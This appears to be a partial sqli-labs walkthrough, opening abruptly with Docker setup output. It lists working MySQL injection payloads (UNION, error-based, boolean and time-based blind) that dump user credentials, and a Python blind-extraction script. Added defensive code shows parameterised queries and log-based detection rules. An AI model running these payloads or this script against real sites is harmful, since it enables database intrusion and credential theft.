Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
c1ec31eb5944: Pull complete
Digest: sha256:305243c734571da2d100c8c8b3c3167a098cab6049c9a5b066b6021a60fcb966
Status: Downloaded newer image for hello-world:latest
Hello from Docker! This message shows that your installation appears to be working correctly.
To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub. (amd64)
 3. The Docker daemon created a new container from that image which runs the executable that produces the output you are currently reading.
 4. The Docker daemon streamed that output to the Docker client, which sent it to your terminal.
To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash
Share images, automate workflows, and more with a free Docker ID: https://hub.docker.com/
For more examples and ideas, visit: https://docs.docker.com/get-started/
It seems a minor problem still showed up, but the line "Hello from Docker!" appeared, so I left it at that.
9. Check whether the image was pulled successfully
docker images
Output:
REPOSITORY    TAG       IMAGE ID       CREATED         SIZE
hello-world   latest    d2c94e258dcb   18 months ago   13.3kB
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
This confirms not only that the injection is string-based, but also that the closing sequence is ') .
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
Level 4
Probing
?id=2'
No error, so nothing can be inferred about the closing delimiter.
?id=2"
Output: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"2"") LIMIT 0,1' at line 1
The closing sequence is ") .
The remaining steps are the same as in the earlier levels.
?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
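The probing in levels 3 and 4 works for one reason: the raw MySQL error is echoed back, and the fragment near the syntax error reveals how the injected value is wrapped ( ('...') versus ("...") ). The following is an added example, not part of the original writeup or of the lab's own code, showing the same query pattern built by string concatenation next to a hardened version that validates the type, binds the value as a parameter and returns only a generic error. It uses an in-memory SQLite table with constructed rows as a stand-in for the lab's users table; the function names are my own.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab's users table (not the lab's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw1"), (2, "bob", "pw2")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """Concatenated query of the shape probed above: a quote inside raw_id
    becomes part of the SQL, and the driver's verbose error is handed back
    to the caller, which is exactly what lets the closing sequence be read off."""
    sql = "SELECT id, username FROM users WHERE id=('" + raw_id + "') LIMIT 0,1"
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # The error text names the broken literal; a real app should never echo it.
        return {"rows": [], "error": str(exc)}


def lookup_hardened(conn, raw_id):
    """Validate the type first, bind the value, and never surface driver errors."""
    try:
        id_value = int(raw_id)          # "1'" or "1')" fails here, before any SQL runs
    except (TypeError, ValueError):
        return {"rows": [], "error": "invalid id"}
    try:
        rows = conn.execute(
            "SELECT id, username FROM users WHERE id = ? LIMIT 1", (id_value,)
        ).fetchall()
    except sqlite3.Error:
        # Log the real exception server-side; the client sees a generic message.
        return {"rows": [], "error": "lookup failed"}
    return {"rows": rows, "error": None}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1')"):
        print(repr(probe), "vulnerable:", lookup_vulnerable(db, probe))
        print(repr(probe), "hardened:  ", lookup_hardened(db, probe))
```

With the single-quote probe the vulnerable version returns a driver error whose text shows the unterminated literal, while the hardened version rejects the input at the type check and never builds SQL from it; a legitimate numeric id behaves identically in both.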
Level 5
Probing
?id=1'
From the response this is a string-based injection closed with ', but the page output is odd: it always shows "You are in".
Check the column count
?id=1' order by 3--+
Check which columns are echoed
?id=-1' union select 1,2,3--+
Nothing is echoed, so UNION injection cannot be used and we need error-based injection instead; here the extractvalue function is used.
?id=1' and extractvalue(1,concat(0x7e,(select database()))) --+
Output:
XPATH syntax error: '~security'
Next, enumerate the tables, columns and data the same way:
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username ,id , password) from users))) --+
Boolean-based blind payloads:
?id=1 and ascii(substr((select database()),1,1))>=100 --+
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=100 --+
?id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() limit 0,1),1,1))>=100 --+
?id=1 and ascii(substr((select username from users limit 0,1),1,1))>=100 --+
import requests

# Placeholder: the target URL is not given in the original post.
host = "http://TARGET_HOST/login.php"


def getDatabase():  # get the database name
    global host
    ans = ''
    for i in range(1, 1000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:   # response text meaning "wrong username"
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:   # out of printable range: end of string
            break
        ans += chr(mid - 1)
    print("database is -> " + ans)


def getTable():  # get the table names
    global host
    ans = ''
    for i in range(1, 1000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid - 1)
    print("table is -> " + ans)


def getColumn():  # get the column names
    global host
    ans = ''
    for i in range(1, 1000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % (i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid - 1)
    print("column is -> " + ans)


def dumpTable():  # dump the table contents
    global host
    ans = ''
    for i in range(1, 10000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))<%d)^1#" % (i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid - 1)
    print("dumpTable is -> " + ans)


dumpTable()
Level 8
Still boolean-based blind injection, same as above.
Level 9
Whatever you send, the page does not change, so time-based blind injection is worth trying.
?id=1' and sleep(3)--+
Open the developer tools (F12) and look at the response time: it took 3.12 seconds, which shows the query closes with '.
Next, use time-based blind injection to work out all the information:
?id=1' and if(ascii(substr((select database()),1,1))>100,sleep(0),sleep(3))--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3))--+
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3))--+
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>100,sleep(0),sleep(3))--+
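Every technique walked through above (UNION with information_schema, extractvalue error-based, boolean blind via ascii(substr(...)), time-based via sleep()) leaves a distinctive footprint in the web server's access log, and the blind variants in particular generate long bursts of near-identical requests. The following is an added example from the defender's side, not part of the original writeup: a small scanner that parses Combined Log Format lines, URL-decodes each query parameter and tags the request with the injection families it matches. The log lines are constructed for this example (illustrative addresses and the lab's Less-N paths); the rule names and functions are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Combined Log Format); the first one is
# a normal request, the rest carry payloads of the kinds shown in the writeup.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /Less-3/?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2024:13:55:40 +0000] "GET /Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+ HTTP/1.1" 200 680
198.51.100.7 - - [10/Oct/2024:13:56:02 +0000] "GET /Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20database())))%20--+ HTTP/1.1" 200 455
198.51.100.7 - - [10/Oct/2024:13:56:09 +0000] "GET /Less-9/?id=1%27%20and%20sleep(3)--+ HTTP/1.1" 200 455
198.51.100.7 - - [10/Oct/2024:13:56:15 +0000] "GET /Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%3E=100%20--+ HTTP/1.1" 200 455
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule: (name, regex applied to the URL-decoded parameter value).
RULES = [
    # a number followed by a quote (optionally a paren) and then an SQL keyword
    # or comment: the value broke out of its literal
    ("quote_break", re.compile(r"""\d['"]\)?\s*(and|or|union|order\s+by|--|#)""", re.I)),
    ("union_select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("schema_enum", re.compile(r"information_schema\.", re.I)),
    ("error_based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("bool_blind", re.compile(r"\bascii\s*\(\s*substr", re.I)),
]


def scan_value(value):
    """Return the names of all rules the decoded parameter value matches."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(text):
    """Parse each log line, decode its query string and report tagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes and turns '+' into a space, so the MySQL
        # comment written as '--+' in the URL is seen as '-- ' here.
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = scan_value(value)
            if hits:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "param": key, "rules": hits, "value": value})
    return findings


def per_source(findings):
    """Count tagged requests per client address; blind injection shows up as a
    long run from one source, which is the signal worth alerting on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], f["rules"])
    print(per_source(scan_log(SAMPLE_LOG)))
```

The rules are deliberately narrow (function call followed by a parenthesis, keyword after a broken literal) to keep false positives down on ordinary parameters; on a real log the per-source count over a sliding window is the more reliable alert for the blind techniques, since a single boolean or time-based character extraction needs dozens of requests.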